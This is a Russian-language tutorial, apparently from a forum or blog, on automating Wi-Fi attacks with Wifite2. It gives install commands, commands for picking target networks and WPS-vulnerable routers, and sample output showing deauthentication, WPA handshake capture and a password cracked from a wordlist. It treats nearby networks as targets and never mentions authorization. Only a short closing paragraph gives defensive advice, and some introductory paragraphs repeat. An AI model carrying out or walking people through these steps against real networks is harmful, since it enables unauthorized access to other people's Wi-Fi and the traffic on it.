В этой статье будет рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi.
В этой статье рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi сети. Узнайте, как выбрать наилучшую стратегию взлома каждой сети.
Wifite2 - это обновленная версия, которая работает быстрее и эффективнее. Она стала мощнее и предлагает более изощренные тактики взлома.
После сортировки Wifite2 отображает информацию о подключенных клиентах, наличии WPS и типе шифрования. На основе этой информации можно выбрать цели для атаки.
Если Wifite2 не установлен в вашей системе, выполните следующие команды в терминале:
Теперь Wifite2 установлен в вашей системе. Введите команду
для получения информации о текущей версии.
После сканирования получите список доступных целей.
Если мы смогли получить 4-этапное рукопожатие, то можно перебрать пароли с помощью флага --dict и пути к словарю.
Пример успешной дешифровки:
Wifite2 – очень хороший пример, когда даже новичок может реализовать эффективную атаку на сети, обладающие наиболее распространенными уязвимостями, как, например, пин в WPS или слабые пароли. С увеличением уровня автоматизации более продвинутых атак, важно быть в тренде и знать наиболее эффективные методы взлома Wi-Fi сетей. В целом, наилучший способ защитить сеть от утилит наподобие Wifite2 – отключить WPS и использовать сильный пароль, который знает ограниченный круг лиц.
Важно отметить, что, если выбрать все цели, Wifite2 будет осуществлять атаки на все сети.
В этой статье рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi сети. Узнайте, как выбрать наилучшую стратегию взлома каждой сети.
Wifite2 и Wifite: Краткий Обзор
Wifite был одним из первых инструментов для автоматизированного взлома Wi-Fi. В сравнении с Besside-ng, Wifite предлагает больше сценариев атак, что делает его более гибким, но иногда и медлительным.Wifite2 - это обновленная версия, которая работает быстрее и эффективнее. Она стала мощнее и предлагает более изощренные тактики взлома.
Сценарий Атаки на Wi-Fi с Использованием Wifite2
Wifite2 реализует эффективный алгоритм для быстрого взлома близлежащих сетей. Программа сначала сканирует все каналы и сортирует сети по силе сигнала.После сортировки Wifite2 отображает информацию о подключенных клиентах, наличии WPS и типе шифрования. На основе этой информации можно выбрать цели для атаки.
Подготовка и Пошаговая Реализация Атаки
Шаг 1: Установка Wifite2
Для начала потребуется сетевой Wi-Fi адаптер с поддержкой режима мониторинга. Wifite2 установлен в Kali Linux по умолчанию.Если Wifite2 не установлен в вашей системе, выполните следующие команды в терминале:
Код:
git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install
Теперь Wifite2 установлен в вашей системе. Введите команду
Код:
wifite -h
для получения информации о текущей версии.
Шаг 2: Подключение Wi-Fi карты
Подключите беспроводной сетевой адаптер, совместимый с Kali Linux. Wifite2 автоматически выбирает адаптер и переключает карту в режим мониторинга. Совет: Убедитесь, что ваш адаптер поддерживает режим мониторинга, иначе атаки могут не сработать.Шаг 3: Настройка Параметров и Поиск Целей
Если вы знаете канал атаки, используйте параметр -c для его указания. Например:
Код:
wifite -c 11
После сканирования получите список доступных целей.
Шаг 4: Исследование Окружающей Территории и Выбор Целей
Изучите список целей и выберите наиболее подходящие для атаки. Можно также использовать флаг -wps для поиска сетей с уязвимым WPS.
Код:
wifite -wps
Шаг 5: Автоматические Атаки на Однотипные Цели
После выбора целей Wifite2 начнет автоматические атаки. Если первый сценарий не сработает, программа попробует другой метод.
Код:
[+] (1/1) starting attacks against 69:96:43:69:D6:96 (The Daily Planet)
[+] The Daily Planet (76db) WPS Pixie-Dust: [--78s] Failed: Timeout after 300 seconds
[+] The Daily Planet (52db) WPA Handshake capture: Discovered new client: C8:E0:EB:45:CD:45
[+] The Daily Planet (35db) WPA Handshake capture: Listening. (clients:1, deauth:11s, timeout:7m59s)
[+] successfully captured handshake
[+] saving copy of handshake to hs/handshake_TheDailyPlanet_69:96:43:69:D6:96_2018-12-24T00-33-18.cap saved
[+] analysis of captured handshake file:
[+] tshark: .cap file contains a valid handshake for 69:96:43:69:D6:96
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid handshake for 69:96:43:69:D6:96
[+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist
[!] Failed to crack handshake: common.txt did not contain password
[+] Finished attacking 1 target(s), exiting
Шаг 6: Сохранение и Анализ Результатов
Результаты атаки можно сохранить для дальнейшего анализа. Если атака увязла, можно использовать сочетание клавиш Ctrl-C для остановки.
Код:
[+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] Trying PIN 12523146 (DeAuth:Timeout) (Timeouts:15)
[!] interrupted
[+] 1 attack(s) remain, do you want to continue?
[+] type c to continue or s to stop:
Если мы смогли получить 4-этапное рукопожатие, то можно перебрать пароли с помощью флага --dict и пути к словарю.
Код:
wifite -wpa --dict ./passwords.txt
Пример успешной дешифровки:
Код:
[+] Cracked WPA Handshake PSK: christmasham
[+] Access Point Name: Bourgeois Pig Guest
[+] Access Point BSSID: DE:F2:86:EC:CA:A0
[+] Encryption: WPA
[+] Handshake File: hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap
[+] PSK (password): christmasham
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting
Wifite2 – очень хороший пример, когда даже новичок может реализовать эффективную атаку на сети, обладающие наиболее распространенными уязвимостями, как, например, пин в WPS или слабые пароли. С увеличением уровня автоматизации более продвинутых атак, важно быть в тренде и знать наиболее эффективные методы взлома Wi-Fi сетей. В целом, наилучший способ защитить сеть от утилит наподобие Wifite2 – отключить WPS и использовать сильный пароль, который знает ограниченный круг лиц.
Важно отметить, что, если выбрать все цели, Wifite2 будет осуществлять атаки на все сети.